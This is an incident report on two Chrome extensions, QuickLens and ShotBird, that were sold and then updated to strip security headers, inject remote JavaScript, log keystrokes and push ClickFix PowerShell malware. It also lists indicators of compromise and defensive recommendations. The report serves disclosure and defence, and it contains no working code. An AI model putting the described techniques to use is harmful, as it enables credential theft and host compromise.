Full Report
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "[email protected]" (BuildMelon), are listed below - QuickLens - Search Screen with
Analysis Summary
# Incident Report: Malicious Chrome Extension Ownership Transfers
## Executive Summary
Two legitimate Google Chrome extensions, QuickLens and ShotBird, were repurposed as malware delivery vehicles following an ownership transfer to a malicious actor. The extensions were updated to bypass browser security headers, inject remote JavaScript via a C2 server, and deploy "ClickFix" style social engineering to execute host-level malware. The incident resulted in the potential theft of sensitive user data, including credentials and financial information, from approximately 7,800 users.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** October 2025 (Initial listing for sale) – February 2026 (Malicious updates)
- **Affected Organization:** Downstream users of QuickLens and ShotBird extensions
- **Sector:** Information Technology / Consumer Software
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** October 11, 2025 (QuickLens listed for sale); January–February 2026 (Ownership transfers).
- **Vector:** Supply Chain / Ownership Transfer.
- **Details:** The original developer (akshayanuonline[at]gmail.com) transferred ownership of QuickLens to "support[at]doodlebuggle[.]top" and ShotBird to "loraprice198865[at]gmail.com."
### Lateral Movement
- **Extension-to-Host:** Threat actors used the compromised extensions to pivot from the browser environment to the victim's operating system using fake "Update" prompts.
### Data Exfiltration/Impact
- **Credential Harvesting:** Captured data from HTML input fields (passwords, PINs, card details).
- **Host Compromise:** Execution of `googleupdate.exe` via PowerShell.
- **Browser Data Theft:** Siphoning of browsing history, stored passwords, and extension tokens.
### Detection & Response
- **Detection:** Identified by researchers at Annex Security (John Tuckner) and monxresearch-sec.
- **Response Actions:** QuickLens was removed from the Chrome Web Store; security researchers published technical breakdowns of the C2 communication and "ClickFix" mechanics.
## Attack Methodology
- **Initial Access:** Acquisition of legitimate browser extensions via secondary markets (ExtensionHub).
- **Persistence:** Malicious code was stored in the browser's local storage and executed on every page load.
- **Defense Evasion:** Stripping of `X-Frame-Options` and CSP headers; delivery of payloads via 1x1 GIF "onload" attributes or direct callbacks to avoid static file analysis.
- **Credential Access:** Hooking HTML elements (`input`, `textarea`, `select`) to log keystrokes.
- **Discovery:** Fingerprinting user geography, browser type, and operating system.
- **Lateral Movement:** Pivoting to host-side execution via social engineering ("ClickFix" prompts).
- **Collection:** Harvesting local browser databases (history, sessions).
- **Exfiltration:** Data sent to external C2 servers polled every five minutes.
- **Impact:** Full host compromise and sensitive data exposure.
## Impact Assessment
- **Financial:** High risk of credit card and banking credential theft.
- **Data Breach:** Exposure of personal identifiers, government IDs, and login tokens for 7,800+ users.
- **Operational:** Disruption of secure browsing; unauthorized command execution on Windows hosts.
- **Reputational:** Damage to the "Featured" extension badge program and developer trust.
## Indicators of Compromise
- **Network indicators:**
- doodlebuggle[.]top
- Communications to C2 servers for JavaScript payload retrieval.
- **File indicators:**
- `googleupdate.exe`
- Extension IDs: `kdenlnncndfnhkognokgfpabgkgehodd` (QuickLens)
- Extension IDs: `gengfhhkjekmlejbhmmopegofnoifnjp` (ShotBird)
- **Behavioral indicators:**
- Unexpected Windows Run dialog prompts.
- PowerShell commands being pasted into `cmd.exe` via web-based instructions.
- Modification of HTTP response headers (removal of security headers).
## Response Actions
- **Containment:** Removal of QuickLens from the Chrome Web Store.
- **Eradication:** Reporting of malicious developer accounts to Google.
- **Recovery:** Public disclosure of the research to prompt manual uninstallation by remaining ShotBird users.
## Lessons Learned
- **Supply Chain Risks:** Legitimate extensions with "Featured" badges can be sold to untrusted parties without notifying the user base.
- **Detection Gaps:** Static analysis of extension source files is insufficient when payloads are delivered dynamically from a C2 into local storage.
- **User Training:** "ClickFix" social engineering remains highly effective at bypassing browser-host isolation.
## Recommendations
- **Inventory Management:** Corporate IT departments should audit installed browser extensions and whitelist only those from verified, enterprise-ready developers.
- **Policy Enforcement:** Use Group Policy Objects (GPO) to block the execution of PowerShell from browser-initiated processes.
- **Monitoring:** Monitor for the removal of security headers (CSP, X-Frame-Options) within network traffic or via browser-based security tools.
- **Caution on Ownership:** Treat developer changes in Chrome Web Store listings as high-risk events.